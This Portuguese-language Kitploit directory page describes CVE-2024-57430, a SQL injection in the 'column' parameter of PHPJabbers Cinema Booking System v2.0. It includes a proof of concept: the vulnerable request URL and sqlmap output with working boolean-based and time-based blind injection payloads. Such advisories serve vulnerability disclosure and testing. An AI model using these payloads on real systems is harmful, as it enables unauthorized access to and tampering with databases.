Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-57430 — CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 é vulnerável a injeção SQL, levando a acesso não autorizado a dados e escalonamento de privilégio. | Kitploit
Ferramentas/GitHubGitHub/ahrixia/cve-2024-57430
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubahrixia/cve-2024-57430

CVE-2024-57430

CVE-2024-57430: PHPJabbers Cinema Booking System v2.0 é vulnerável a injeção SQL, levando a acesso não autorizado a dados e escalonamento de privilégio.

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-57430

Uma vulnerabilidade de injeção SQL na função pjActionGetUser do PHPJabbers Cinema Booking System v2.0 permite que atacantes manipulem consultas ao banco de dados através do parâmetro column. Explorar esta falha pode levar à divulgação não autorizada de informações, escalonamento de privilégios ou manipulação do banco de dados.

Parâmetro Vulnerável: column

Impacto:

A injeção SQL pode levar ao acesso não autorizado a informações sensíveis, modificação do banco de dados e até mesmo ao comprometimento total do servidor de banco de dados. Isso representa uma ameaça crítica à confidencialidade, integridade e disponibilidade da aplicação.

Exploit - Prova de Conceito (POC)

Injeção SQL

Requisição GET na URL: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=*&&direction=ASC&page=1&rowCount=10

SQLMAP no column

root@kitploit:~
Parameter: #1* (URI)
  Type: boolean-based blind
  Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name RLIKE (SELECT (CASE WHEN (7874=7874) THEN 0x6e616d65 ELSE 0x28 END))&direction=ASC&page=1&rowCount=10

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: http://127.0.0.1/CinemaBookingDev/index.php?controller=pjAdminUsers&action=pjActionGetUser&column=name AND (SELECT 6530 FROM (SELECT(SLEEP(5)))UFOj)&direction=ASC&page=1&rowCount=10
Baixar ferramenta